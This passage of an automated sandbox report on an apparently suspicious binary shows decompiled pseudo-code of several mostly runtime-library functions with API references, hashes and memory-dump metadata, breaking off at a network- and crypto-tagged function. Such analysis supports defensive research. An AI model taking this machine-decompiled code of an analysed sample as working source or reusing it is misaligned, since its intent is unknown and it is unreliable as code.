                                                                                                                                                                                          0x00ce7afb
                                                                                                                                                                                          0x00ce7afb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetGetConnectedState.WININET(?,00000000), ref: 00CE7AE7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConnectedInternetState
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 97057780-0
                                                                                                                                                                                          • Opcode ID: ec3a7e9250d953b25d1614ea078e181ab4e1c9e876d56f65a3454023d183898d
                                                                                                                                                                                          • Instruction ID: 241f1acaa5400441fb7073ecddc928fad68910d5c1b0e80461c491f0025a42c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec3a7e9250d953b25d1614ea078e181ab4e1c9e876d56f65a3454023d183898d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D0A71171838865DB04D7B78C0B75E35DC4B0034CF0402B46801D1181EAE4DB00A370
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9BB36 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00C9BB36(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, signed int _a20) {

				_push(0);
				E00D0155A(0xd3021b, __ebx, __edi, __esi);
				if(( *0xd66618 & 0x00000001) == 0) {
					 *0xd66618 =  *0xd66618 | 0x00000001;
					_t3 =  &_a20;
					_a20 = _a20 & 0x00000000;
					E00CF134E(__ebx, 0xd665d8, __edx, __edi, 0xd665d8,  *_t3); // executed
					E00D010C4( *_t3, 0xd396cd); // executed
				}
				return E00D01632(0xd665d8);
			}



                                                                                                                                                                                          0x00c9bb36
                                                                                                                                                                                          0x00c9bb3d
                                                                                                                                                                                          0x00c9bb4e
                                                                                                                                                                                          0x00c9bb50
                                                                                                                                                                                          0x00c9bb57
                                                                                                                                                                                          0x00c9bb57
                                                                                                                                                                                          0x00c9bb5e
                                                                                                                                                                                          0x00c9bb68
                                                                                                                                                                                          0x00c9bb6d
                                                                                                                                                                                          0x00c9bb75

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9BB3D
                                                                                                                                                                                            • Part of subcall function 00CF134E: __EH_prolog3.LIBCMT ref: 00CF1355
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 431132790-0
                                                                                                                                                                                          • Opcode ID: a06c1821bea305d5debf7f1f12dd9faae5bd7428443d41531a0138de90da7374
                                                                                                                                                                                          • Instruction ID: 3a27d3d255043757f63180b7e9a979eacead0ee12edcb8f646146d47bb6046f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: a06c1821bea305d5debf7f1f12dd9faae5bd7428443d41531a0138de90da7374
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D02E2820034023C605B328A93B30C2990AB10324F05005CF9098A2F3CA8A8A8847FA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D01088 Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00D01088(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t9;
				void* _t18;

				_push(0xc);
				_push(0xd58a58);
				E00D009BC(__ebx, __edi, __esi);
				E00D033C3();
				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
				_t9 = E00D00F9D(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
				 *(_t18 - 4) = 0xfffffffe;
				E00D010BE();
				return E00D00A01( *((intOrPtr*)(_t18 - 0x1c)));
			}





                                                                                                                                                                                          0x00d01088
                                                                                                                                                                                          0x00d0108a
                                                                                                                                                                                          0x00d0108f
                                                                                                                                                                                          0x00d01094
                                                                                                                                                                                          0x00d01099
                                                                                                                                                                                          0x00d010a0
                                                                                                                                                                                          0x00d010a6
                                                                                                                                                                                          0x00d010a9
                                                                                                                                                                                          0x00d010b0
                                                                                                                                                                                          0x00d010bd

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00D033C3: __lock.LIBCMT ref: 00D033C5
                                                                                                                                                                                          • __onexit_nolock.LIBCMT ref: 00D010A0
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __decode_pointer.LIBCMT ref: 00D00FAC
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __decode_pointer.LIBCMT ref: 00D00FBC
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __msize.LIBCMT ref: 00D00FDA
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __realloc_crt.LIBCMT ref: 00D00FFE
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __realloc_crt.LIBCMT ref: 00D01014
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __encode_pointer.LIBCMT ref: 00D01026
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __encode_pointer.LIBCMT ref: 00D01034
                                                                                                                                                                                            • Part of subcall function 00D00F9D: __encode_pointer.LIBCMT ref: 00D0103F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1316407801-0
                                                                                                                                                                                          • Opcode ID: 6e49c2cf830246a4523d5b9b2e8b3bea062884be612f23925ce6d2f6b16202de
                                                                                                                                                                                          • Instruction ID: aa85e4e3c94b55d840171ac27a2375a8432cb9ea7161792039d3ba1d82afc8a1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e49c2cf830246a4523d5b9b2e8b3bea062884be612f23925ce6d2f6b16202de
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3D05E70900349BEDF10BBA8D842B8D7F70EF00321F208245B028661D2CAB40641AF71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC654C Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CC654C(intOrPtr* __ecx) {
				void* _t8;
				intOrPtr* _t10;

				_t10 = __ecx;
				_t8 =  *(__ecx + 4);
				 *__ecx = 0xd3f8cc;
				if(_t8 != 0) {
					_t8 = FindCloseChangeNotification(_t8); // executed
					 *(_t10 + 4) =  *(_t10 + 4) & 0x00000000;
				}
				 *(_t10 + 8) =  *(_t10 + 8) | 0xffffffff;
				 *(_t10 + 0x18) =  *(_t10 + 0x18) & 0x00000000;
				return _t8;
			}





                                                                                                                                                                                          0x00cc654d
                                                                                                                                                                                          0x00cc654f
                                                                                                                                                                                          0x00cc6552
                                                                                                                                                                                          0x00cc655a
                                                                                                                                                                                          0x00cc655d
                                                                                                                                                                                          0x00cc6563
                                                                                                                                                                                          0x00cc6563
                                                                                                                                                                                          0x00cc6567
                                                                                                                                                                                          0x00cc656b
                                                                                                                                                                                          0x00cc6570

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?,?,00CC65E2,00CC64C6,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00CC6E1D,?,&pid=), ref: 00CC655D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                                                                          • Opcode ID: 3a120ebfe58fb7848ae2cc97cea50295569e3dff44c148a4be5648db7e6cff83
                                                                                                                                                                                          • Instruction ID: e025f12f335dcf773b160d836c99b682097a636925d32f131447deee80f4f93b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a120ebfe58fb7848ae2cc97cea50295569e3dff44c148a4be5648db7e6cff83
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0D0A7714007018BC3348F29E608752B7E4AF00731F244A0DD4F6C36D0C374E944CAA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9780E Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C9780E(int _a4, WCHAR* _a8, int _a12) {
				int _t4;
				WCHAR* _t6;

				_t6 = _a8;
				_t4 = LoadStringW( *0xd675fc, _a4, _t6, _a12); // executed
				if(_t4 == 0) {
					 *_t6 = 0;
					return _t4;
				}
				return _t4;
			}





                                                                                                                                                                                          0x00c97813
                                                                                                                                                                                          0x00c97822
                                                                                                                                                                                          0x00c9782a
                                                                                                                                                                                          0x00c9782e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9782e
                                                                                                                                                                                          0x00c97832

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadStringW.USER32(?,?,?), ref: 00C97822
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2948472770-0
                                                                                                                                                                                          • Opcode ID: 84a107041b6165972bf78af114e5b0c6a4d5737e0a86aa00c861f4bb2052ae7b
                                                                                                                                                                                          • Instruction ID: 219c0cfaf19f1ce0a5c0cd159c2e8222277fdcd620ef9dcbefca13e749f394fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 84a107041b6165972bf78af114e5b0c6a4d5737e0a86aa00c861f4bb2052ae7b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BD0C93220D352DBCB21DF15AC08D5BBFA5FF98350B040C2DF49592620D3219854DBA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D10A7A Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00D10A7A() {
				void* _t1;

				_t1 = E00D10A08(0); // executed
				return _t1;
			}




                                                                                                                                                                                          0x00d10a7c
                                                                                                                                                                                          0x00d10a82

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __encode_pointer.LIBCMT ref: 00D10A7C
                                                                                                                                                                                            • Part of subcall function 00D10A08: TlsGetValue.KERNEL32(00000000,?,00D10A81,00000000,00D27903,00D685D8,00000000,00000314,?,00D1149E,00D685D8,Microsoft Visual C++ Runtime Library,00012010), ref: 00D10A1A
                                                                                                                                                                                            • Part of subcall function 00D10A08: TlsGetValue.KERNEL32(00000005,?,00D10A81,00000000,00D27903,00D685D8,00000000,00000314,?,00D1149E,00D685D8,Microsoft Visual C++ Runtime Library,00012010), ref: 00D10A31
                                                                                                                                                                                            • Part of subcall function 00D10A08: RtlEncodePointer.NTDLL(00000000,?,00D10A81,00000000,00D27903,00D685D8,00000000,00000314,?,00D1149E,00D685D8,Microsoft Visual C++ Runtime Library,00012010), ref: 00D10A6F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2585649348-0
                                                                                                                                                                                          • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                                          • Instruction ID: 6c3d1926a35adefbf8fa5b09a6e22af62e147667dd2caa85e1e7fe7a05dfcf87
                                                                                                                                                                                          • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9B6E5 Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C9B6E5(intOrPtr* __ecx, void* __edx, void* __ebp, WCHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t3;
				int _t8;
				WCHAR* _t14;
				int _t19;
				intOrPtr* _t21;

				_t17 = __edx;
				_t3 =  *0xd5d01c; // 0xd5d014
				_t14 = _a4;
				_t21 = __ecx;
				 *__ecx = _t3;
				if(_t14 != 0) {
					_t26 = _t14 >> 0x10;
					if(_t14 >> 0x10 != 0) {
						_t19 = lstrlenW(_t14);
						__eflags = _t19;
						if(__eflags != 0) {
							_t8 = E00C98243(_t21, _t17, _t19, _t21, __eflags, _t19);
							__eflags = _t8;
							if(_t8 != 0) {
								__eflags = _t19 + _t19 + 2;
								E00C9754F(_t14,  *_t21, _t19 + _t19 + 2, _t14, _t19 + _t19);
							}
						}
					} else {
						E00C9ACF3(_t14, __ecx, __edx, _t26, _t14 & 0x0000ffff); // executed
					}
				}
				return _t21;
			}











                                                                                                                                                                                          0x00c9b6e5
                                                                                                                                                                                          0x00c9b6e5
                                                                                                                                                                                          0x00c9b6eb
                                                                                                                                                                                          0x00c9b6f0
                                                                                                                                                                                          0x00c9b6f2
                                                                                                                                                                                          0x00c9b6f6
                                                                                                                                                                                          0x00c9b6fd
                                                                                                                                                                                          0x00c9b700
                                                                                                                                                                                          0x00c9b715
                                                                                                                                                                                          0x00c9b717
                                                                                                                                                                                          0x00c9b719
                                                                                                                                                                                          0x00c9b71e
                                                                                                                                                                                          0x00c9b723
                                                                                                                                                                                          0x00c9b725
                                                                                                                                                                                          0x00c9b72c
                                                                                                                                                                                          0x00c9b732
                                                                                                                                                                                          0x00c9b737
                                                                                                                                                                                          0x00c9b725
                                                                                                                                                                                          0x00c9b702
                                                                                                                                                                                          0x00c9b706
                                                                                                                                                                                          0x00c9b706
                                                                                                                                                                                          0x00c9b700
                                                                                                                                                                                          0x00c9b73f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(00C9AFFB,00000000,?,?,00CD53CC,00000004,?,?,00CDE451,?,000000AB,00000008,00CB6092,00000004,00CB8D57,00000004), ref: 00C9B70F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 260bb6078e4b35ffa402eafa9cd226403500b35a1e79f235170ae6a93f941921
                                                                                                                                                                                          • Instruction ID: 2b0cd4d419ca3b8a9a7a2295dcec4074d38a99c5136ba3871202d6c5e179e40b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 260bb6078e4b35ffa402eafa9cd226403500b35a1e79f235170ae6a93f941921
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF0BEB6200612BB8A206AEDAD89C6BB29CEFA4351354052AFD90C7300EB21CD519670
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9CA59 Relevance: 1.3, APIs: 1, Instructions: 18stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C9CA59(void* __ecx, WCHAR* _a4) {
				int _t2;
				WCHAR* _t7;
				void* _t8;

				_t7 = _a4;
				_t8 = __ecx;
				if(_t7 != 0) {
					_t2 = lstrlenW(_t7);
				} else {
					_t2 = 0;
				}
				E00C98323(_t8, _t2, _t7); // executed
				return _t8;
			}






                                                                                                                                                                                          0x00c9ca5b
                                                                                                                                                                                          0x00c9ca5f
                                                                                                                                                                                          0x00c9ca63
                                                                                                                                                                                          0x00c9ca6a
                                                                                                                                                                                          0x00c9ca65
                                                                                                                                                                                          0x00c9ca65
                                                                                                                                                                                          0x00c9ca65
                                                                                                                                                                                          0x00c9ca74
                                                                                                                                                                                          0x00c9ca7d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(00CC6DE8,00000000,?,00CC6DE8,&ver=,00000000,?,?,?,?,?,00000000,000000C8,?,?,0000000C), ref: 00C9CA6A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1659193697-0
                                                                                                                                                                                          • Opcode ID: 88f66cc02370622283be064fce946daea8e46f71a298e4239698fbbcc0f40ef2
                                                                                                                                                                                          • Instruction ID: 20d8411231cf7cf90dcf906d5440430db68172d52aef8058ee1079905383755d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88f66cc02370622283be064fce946daea8e46f71a298e4239698fbbcc0f40ef2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7D0A9323001202A4A51A26E6C0886BE6ACDBEAF70301442EB456C3220CE308D42A2B5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00C8AA00 Relevance: 56.3, APIs: 27, Strings: 5, Instructions: 338networkCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E00C8AA00(void* __ebx, WCHAR* __ecx, intOrPtr __edx, void* __ebp, void* __eflags, signed short* _a12, signed int _a16, short _a24, intOrPtr _a32, void* _a36, char _a40, char* _a52, intOrPtr _a56, short _a60, char* _a64, long _a68, char* _a72, long _a76, char* _a80, intOrPtr _a84, char _a96, char _a98, short _a316, char _a352, char _a354, short _a572, char _a608, char _a610, short _a1000, short _a1052, char _a1054, char _a5288, char _a5290, signed int _a9356, signed int _a9440, signed int _a9456) {
				intOrPtr _v0;
				void* _v12;
